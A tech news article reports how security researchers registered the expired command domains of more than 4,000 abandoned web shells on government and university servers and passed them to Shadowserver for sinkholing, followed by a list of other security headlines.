Category: IT|Jan 8, 2025 | Author: Admin

Over 4,000 backdoors hijacked by registering expired domains

Share on

Over 4,000 abandoned but still active web backdoors were hijacked and their communication infrastructure sinkholed after researchers registered expired domains used for commanding them.

Over 4,000 backdoors hijacked by registering expired domains

Some of the live malware (web shells) was deployed on web servers of high-profile targets, including government and university systems, ready to execute commands from anyone who took control of the communication domains. 

Together with The Shadowserver Foundation, researchers at offensive security outfit WatchTowr Labs prevented these domains and the corresponding victims from falling into the hands of malicious actors.

Finding thousands of breached systems
Backdoors are malicious tools or code planted on a compromised system to allow unauthorized remote access and control. Threat actors typically use them for persistent access and to execute the compromised system commands that would further the attack.

WatchTowr researchers started hunting for domains in various web shells and purchased any that had expired, essentially taking control of the backdoors. 

After setting up a logging system, the abandoned but still active malware started sending requests that allowed the researchers to identify at least some of the victims.

From registering more than 40 domains, the researchers received communication from over 4,000 compromised systems attempting to "phone home."

 

The researchers found several backdoor types, including the "classic" r57shell, the more advanced c99shell, which offers file management and brute-forcing capabilities, and the 'China Chopper' web shell that is often linked to APT groups.

The report even mentions one backdoor that showcased behavior associated with the Lazarus Group, although it later clarifies that it was likely reuse of the threat actor's tool by others.

Among the varied set of breached machines, WatchTowr found multiple systems within China's government infrastructure, including courts, a compromised Nigerian government judicial system, and systems in Bangladesh's government network.

In addition, infected systems were found in educational institutions in Thailand, China, and South Korea.

WatchTowr handed over the responsibility of managing the hijacked domains to The Shadowserver Foundation to ensure that they will not become available for takeover in the future. Shadowserver is now sink-holing all traffic sent from breached systems to its domains.

WatchTowr's research, although not complex, shows that expired domains from malware operations could still serve new cybercriminals, who would also get some victims by simply registering the control domains.

Sponsored Ads:

Comments:


TikTok-19-01-25.png

TikTok shuts down in the US as Trump throws the company a lifeline

Category: IT|Jan 19, 2025 | Author: Admin
Discord-18-01-25.png

Malicious PyPi package steals Discord auth tokens from devs

Category: IT|Jan 18, 2025 | Author: Admin
China_matrix-17-01-25.png

GDPR complaints filed against TikTok, Temu for sending user data to China

Category: IT|Jan 17, 2025 | Author: Admin
Fortinet-16-01-25.png

Hackers leak configs and VPN credentials for 15,000 FortiGate devices

Category: General|Jan 16, 2025 | Author: Admin
windows-blue-background-15-01-25.png

January Windows updates may fail if Citrix SRA is installed

Category: Microsoft|Jan 15, 2025 | Author: Admin
nominet-14-01-25.png

UK domain registry Nominet confirms breach via Ivanti zero-day

Category: IT|Jan 14, 2025 | Author: Admin
back-13-01-25.png

Phishing texts trick Apple iMessage users into disabling protection

Category: Apple|Jan 13, 2025 | Author: Admin
church-12-01-25.png

Pastor who saw crypto project in his "dream" indicted for fraud

Category: IT|Jan 12, 2025 | Author: Admin
LDAPNightmare-11-01-25.png

Fake LDAPNightmware exploit on GitHub spreads infostealer malware

Category: IT|Jan 11, 2025 | Author: Admin
Outlook-for-Windows-10-01-25.png

Microsoft to force install new Outlook on Windows 10 PCs in February

Category: Microsoft|Jan 10, 2025 | Author: Admin
proton-mail-header-09-01-25.png

Proton Mail still down as Proton recovers from worldwide outage

Category: IT|Jan 9, 2025 | Author: Admin
backdoror-web-shells-08-01-25.png

Over 4,000 backdoors hijacked by registering expired domains

Category: IT|Jan 8, 2025 | Author: Admin
cryptocurrency.png

Cryptocurrency wallet drainers stole $494 million in 2024

Category: IT|Jan 7, 2025 | Author: Admin
google-06-01-25.png

Google Chrome is making it easier to share specific parts of long PDFs

Category: Google|Jan 6, 2025 | Author: Admin
email-server-05-01-25.png

Over 3 million mail servers without encryption exposed to sniffing attacks

Category: IT|Jan 5, 2025 | Author: Admin
more